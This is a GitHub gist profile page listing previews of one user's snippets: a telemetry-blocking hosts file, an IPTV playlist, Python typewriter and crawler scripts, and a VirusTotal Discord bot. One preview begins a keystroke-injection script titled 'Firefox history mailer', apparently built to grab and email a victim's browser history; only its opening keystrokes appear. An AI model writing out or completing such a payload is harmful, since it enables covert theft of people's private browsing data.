Skip to content

Instantly share code, notes, and snippets.

View meatyite's full-sized avatar

meaty meatyite

View GitHub Profile
@meatyite
meatyite / hosts
Created October 6, 2018 14:01
stop windows 10 spying hosts file
127.0.0.1 localhost
127.0.0.1 vortex.data.microsoft.com
127.0.0.1 vortex-win.data.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com
127.0.0.1 telecommand.telemetry.microsoft.com.nsatc.net
@meatyite
meatyite / israeltv.m3u
Last active March 13, 2024 17:04
israeli iptv m3u file
#EXTM3U
#EXTINF:0 tvg-logo="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c8/Kan11Logo.svg/220px-Kan11Logo.svg.png",Kan 11 | כאן 11
https://kanlivep2event-i.akamaihd.net/hls/live/747610/747610/master.m3u8
#EXTINF:0 tvg-logo="https://upload.wikimedia.org/wikipedia/commons/thumb/6/6b/KanHinuchit.svg/220px-KanHinuchit.svg.png",Kan Chinochit | כאן חינוכית
https://kanlivep2event-i.akamaihd.net/hls/live/747600/747600/master.m3u8
#EXTINF:0 tvg-logo="https://upload.wikimedia.org/wikipedia/he/thumb/5/5a/Ch13logo.svg/150px-Ch13logo.svg.png",Channel 13 | ערוץ 13
http://nana10-hdl-il-sw.ctedgecdn.net/10tv_Desktop/index.m3u8?dvr
#EXTINF:0 tvg-logo="https://upload.wikimedia.org/wikipedia/commons/thumb/5/53/Arutz_20.svg/220px-Arutz_20.svg.png",Channel 20 | ערוץ 20
https://dvr.ch20-cdnwiz.com/hls/dvr.m3u8
#EXTINF:0 tvg-logo="https://upload.wikimedia.org/wikipedia/he/thumb/0/09/Kan88Logo.svg/451px-Kan88Logo.svg.png",Kan 88 | כאן 88
@meatyite
meatyite / pyTypingCinema.py
Created March 9, 2019 15:30
pyTypingCinema | Typewriter effect in python
#!/usr/bin/python3
import os, sys
from time import sleep
filename = ""
wait_before_each_char = 0.05
def cls():
os.system('cls' if os.name=='nt' else 'clear')
@meatyite
meatyite / pyTypingCinemaTelnet.py
Last active April 12, 2019 12:42
pyTypingCinemaTelnet | Transmit typewriter text over telnet
#!/usr/bin/python3
###################################################################
# Made by sl4v #
# Licensed under the WTFPL, see http://www.wtfpl.net/txt/copying/ #
###################################################################
import os, sys, socket
from time import sleep
from threading import Thread
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@meatyite
meatyite / FIREFOX_HISTORY_GRABBER.txt
Created March 30, 2019 13:37
Firefox history mailer (duckyscript)
GUI r
DELAY 500
STRING firefox.exe
DELAY 50
ENTER
DELAY 1500
ALT
DELAY 100
RIGHT
DELAY 50
@meatyite
meatyite / calculate_total_time_of_media.py
Last active March 31, 2019 12:16
calculate_total_time_of_media.py
import subprocess, os, datetime
from glob import glob
from threading import Thread
from sys import argv
videoFileExtensions = ['mkv', 'mp4', 'ogv', 'avi', 'wmv', 'flv']
total_time = datetime.timedelta(hours=0, minutes=0, seconds=0)
def getLength(filename):
global total_time
@meatyite
meatyite / http_tree.py
Last active April 12, 2019 17:04
http_tree.py
#!/usr/bin/python3
from bs4 import BeautifulSoup as bs
from urllib.parse import urlparse, urljoin
import urllib.request as urllib
import sys
from os.path import basename
already_scanned_urls = []
def isDirnameURL(url):
@meatyite
meatyite / bee_movie_script.txt
Created April 12, 2019 12:50
Entire Bee movie script
According to all known laws
of aviation,
there is no way a bee
should be able to fly.
@meatyite
meatyite / pyTypingCinemaTelnetV2.py
Last active May 11, 2019 12:10
Python Typewriter effect in Telnet
#!/usr/bin/python3
#########################################
# Made by sl4v #
# Licensed under the WTFPL, #
# see http://www.wtfpl.net/txt/copying/ #
#########################################
import sys
import socket
@meatyite
meatyite / Virustotal_Scanner_DiscordBot.py
Last active April 17, 2019 09:44
Virustotal_Scanner_DiscordBot.py
#!/usr/bin/python3
######################################
# Made by sl4v #
# Licensed under the WTFPL, #
# see www.wtfpl.net/txt/copying/ #
######################################
import discord, requests, json, sys